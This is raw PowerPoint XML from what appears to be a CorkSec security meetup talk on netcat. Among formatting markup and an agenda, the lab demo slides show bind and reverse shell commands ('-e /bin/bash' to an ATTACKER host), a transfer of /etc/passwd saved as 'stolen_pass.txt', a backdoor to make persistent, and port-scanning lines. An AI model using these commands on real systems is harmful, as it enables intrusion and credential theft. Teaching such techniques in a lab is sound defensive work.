                <a:effectLst>
                  <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                    <a:prstClr val="black">
                      <a:alpha val="70000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>20:25-20:30</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IE" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" noProof="0" dirty="0" smtClean="0">
                <a:ln w="3200">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:shade val="75000"/>
                      <a:alpha val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                    <a:prstClr val="black">
                      <a:alpha val="70000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Solution to puzzle</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E" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln w="3200">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:shade val="75000"/>
                      <a:alpha val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                    <a:prstClr val="black">
                      <a:alpha val="70000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>20:30-21:30 – Google Cardboard</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IE" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" noProof="0" dirty="0" smtClean="0">
                <a:ln w="3200">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:shade val="75000"/>
                      <a:alpha val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                    <a:prstClr val="black">
                      <a:alpha val="70000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> demo</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-IE" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln w="3200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:shade val="75000"/>
                    <a:alpha val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                  <a:prstClr val="black">
                    <a:alpha val="70000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>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E" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln w="3200">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:shade val="75000"/>
                      <a:alpha val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                    <a:prstClr val="black">
                      <a:alpha val="70000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>21:30++ More Socialising</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IE" sz="3600" spc="-100" dirty="0" smtClean="0">
              <a:ln w="3200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:shade val="75000"/>
                    <a:alpha val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
              </a:ln>
              <a:effectLst>
                <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                  <a:prstClr val="black">
                    <a:alpha val="70000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>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IE" sz="3600" spc="-100" dirty="0" smtClean="0">
              <a:ln w="3200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:shade val="75000"/>
                    <a:alpha val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
              </a:ln>
              <a:effectLst>
                <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                  <a:prstClr val="black">
                    <a:alpha val="70000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>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E" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln w="3200">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:shade val="75000"/>
                      <a:alpha val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                    <a:prstClr val="black">
                      <a:alpha val="70000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Meetup.com/CorkSec</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IE" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln w="3200">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:shade val="75000"/>
                      <a:alpha val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                    <a:prstClr val="black">
                      <a:alpha val="70000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-IE" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln w="3200">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:shade val="75000"/>
                      <a:alpha val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                    <a:prstClr val="black">
                      <a:alpha val="70000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IE" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln w="3200">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:shade val="75000"/>
                      <a:alpha val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                    <a:prstClr val="black">
                      <a:alpha val="70000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-IE" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln w="3200">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:shade val="75000"/>
                      <a:alpha val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                    <a:prstClr val="black">
                      <a:alpha val="70000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr kumimoji="0" lang="en-IE" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln w="3200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:shade val="75000"/>
                    <a:alpha val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                  <a:prstClr val="black">
                    <a:alpha val="70000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31737391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2209800"/>
            <a:ext cx="1981200" cy="19812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t>Attacker Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> VICTIM 4444</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="2209800"/>
            <a:ext cx="1981200" cy="19812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t>Firewall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477000" y="2209800"/>
            <a:ext cx="1981200" cy="19812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t>Victim Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nlvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 4444 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>–e /bin/bash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2667000"/>
            <a:ext cx="1752600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="560F11"/>
            </a:solidFill>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Multiply 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="2209800"/>
            <a:ext cx="838200" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="560F1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772433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2209800"/>
            <a:ext cx="1981200" cy="19812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t>Attacker Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nlvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="2209800"/>
            <a:ext cx="1981200" cy="19812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t>Firewall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477000" y="2209800"/>
            <a:ext cx="1981200" cy="19812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t>Victim Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ATTACKER 80 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>–e /bin/bash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2667000" y="2590800"/>
            <a:ext cx="3733800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="560F1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150297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334000"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>DEMO:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Green = Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Red = Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Chat Server:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc –nlvp 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc ms.ftrlab 4444</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>File Transfer:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>–nlvp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>4444 &lt; /etc/passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc ms.ftrlab 4444 &gt; stolen_pass.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Backdoor:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc –lp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>4444 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-e /bin/bash</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc ms.ftrlab 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Make the backdoor persistant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Do a reverse shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180074039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334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Netcat Port Scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc –v –r –w3 –z IP START_PORT-END_PORT</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Netcat Banner Scrapping Port Scanner</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>echo “ ” | nc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
